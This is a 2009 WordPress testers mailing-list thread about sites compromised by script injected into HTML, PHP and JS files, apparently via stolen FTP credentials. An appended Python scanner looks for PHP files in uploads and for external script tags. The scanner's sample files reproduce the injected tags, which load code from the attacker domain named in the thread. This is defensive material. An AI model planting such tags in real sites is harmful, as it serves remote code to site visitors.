scan your upload folder for .php files. you might find an attacker script
in there.
tom
On 20.11.2009, at 10:57, Dion Hulse (dd32) <[email protected]> wrote:
It appears to have inserted that after </head> in all the .html and .php
files it could find, and the document.write in all .js's.
I don't think it's a WordPress vulnerability, as it's affecting the files
rather than actual posts..
I'd be tempted to suggest a full virus scan of your computer..
possibility it's stealing your FTP credentials?
Any other websites on that account affected? What about files outside of
WordPress?
On Fri, 20 Nov 2009 20:53:10 +1100, Naudirz <[email protected]> wrote:
Here is more info:
Search "northstarsocal.com" (98 hits in 98 files)
On Fri, Nov 20, 2009 at 9:57 AM, Dion Hulse (dd32) <[email protected]> wrote:
What are the symptoms of the hack?
Install something to log all post requests ASAP, to gather data if it's a
new vulnerability: http://www.village-idiot.org/post-logger
You'd not by any chance be on MediaTemple servers would you? *(Who's your
webhost)
On Fri, 20 Nov 2009 19:52:46 +1100, Naudirz <[email protected]> wrote:
OK, 'cause my 2.9 nightly gets hacked every day..
In that case it's a new security bug..
I've wasted every file/folder and done a fresh installation, everything
except the db is new, also passwd is changed on everything except db.
No extra user is in db.
On Fri, Nov 20, 2009 at 9:39 AM, Dion Hulse (dd32) <[email protected]> wrote:
Yes. Everything in the 2.8 branch are backports from the 2.9 branch.
On Fri, 20 Nov 2009 19:35:20 +1100, Naudirz <[email protected]> wrote:
Hi!
Is this fix also in the 2.9 nightly build?
/Phibrz
On Thu, Nov 12, 2009 at 5:43 PM, Ryan Boren <[email protected]> wrote:
http://wordpress.org/wordpress-2.8.6-beta1.zip
Fixes these two security issues:
https://core.trac.wordpress.org/query?status=closed&group=resolution&milestone=2.8.6
A logged in user with author privileges is required to exploit.
Press This and uploads need testing.
_______________________________________________
wp-testers mailing list
[email protected]
http://lists.automattic.com/mailman/listinfo/wp-testers
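
An added example, not part of the thread: a Python triage scan combining the two checks suggested above, `.php` files inside the upload folder and `<script src=...>` tags (including ones emitted through `document.write`) that load from a host the site does not normally use. The `uploads` directory name, the extension sets, the `allowed_hosts` parameter and the sample tree (built in a temporary directory, file names constructed) are assumptions of this example.

```python
import os
import re
import tempfile
from urllib.parse import urlparse

# <script ... src=URL>, quoted or bare, also when embedded in a document.write('...') string.
SCRIPT_SRC = re.compile(r"<script\b[^>]*?\bsrc\s*=\s*[\"']?\s*([^\s\"'>]+)", re.I)
TEXT_EXT = {".php", ".html", ".htm", ".js", ".xml"}
PHP_EXT = {".php", ".phtml", ".php5"}


def external_hosts(text, allowed_hosts):
    """Return hosts of absolute script URLs in text that are not in allowed_hosts."""
    hosts = set()
    for match in SCRIPT_SRC.finditer(text):
        url = match.group(1)
        if not url.lower().startswith(("http://", "https://", "//")):
            continue  # relative URL: served by the site itself
        host = (urlparse(url).hostname or "").lower()
        if host and host not in allowed_hosts:
            hosts.add(host)
    return hosts


def scan_tree(root, allowed_hosts=(), upload_dir="uploads"):
    """Walk root and return sorted (relative_path, reason, detail) findings."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            ext = os.path.splitext(name)[1].lower()
            if ext in PHP_EXT and upload_dir in rel.split("/")[:-1]:
                findings.append((rel, "php-in-uploads", ""))
            if ext in TEXT_EXT:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
                for host in sorted(external_hosts(text, allowed)):
                    findings.append((rel, "external-script", host))
    return sorted(findings)


def build_sample_tree(root):
    """Constructed sample site: two injected files, one clean page, one PHP file in uploads."""
    url = "http://northstarsocal.com/testpage/contact.php"  # URL quoted in the thread
    samples = {
        "readme.html": "<head></head><script src=" + url + "></script><body>",
        "index.html": '<script src="/wp-includes/js/jquery/jquery.js"></script>',
        "wp-includes/js/jquery/jquery.js": "document.write('<script src= " + url + " ><\\/script>');",
        "wp-content/uploads/2009/11/photo.jpg": "not really a jpeg",
        "wp-content/uploads/2009/11/thumb.php": "<?php /* placeholder */ ?>",
    }
    for rel, body in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        print(*scan_tree(tmp), sep="\n")
```

Pass the hosts the site legitimately loads scripts from as `allowed_hosts` to cut noise; a clean result does not rule out a backdoor placed outside the upload folder.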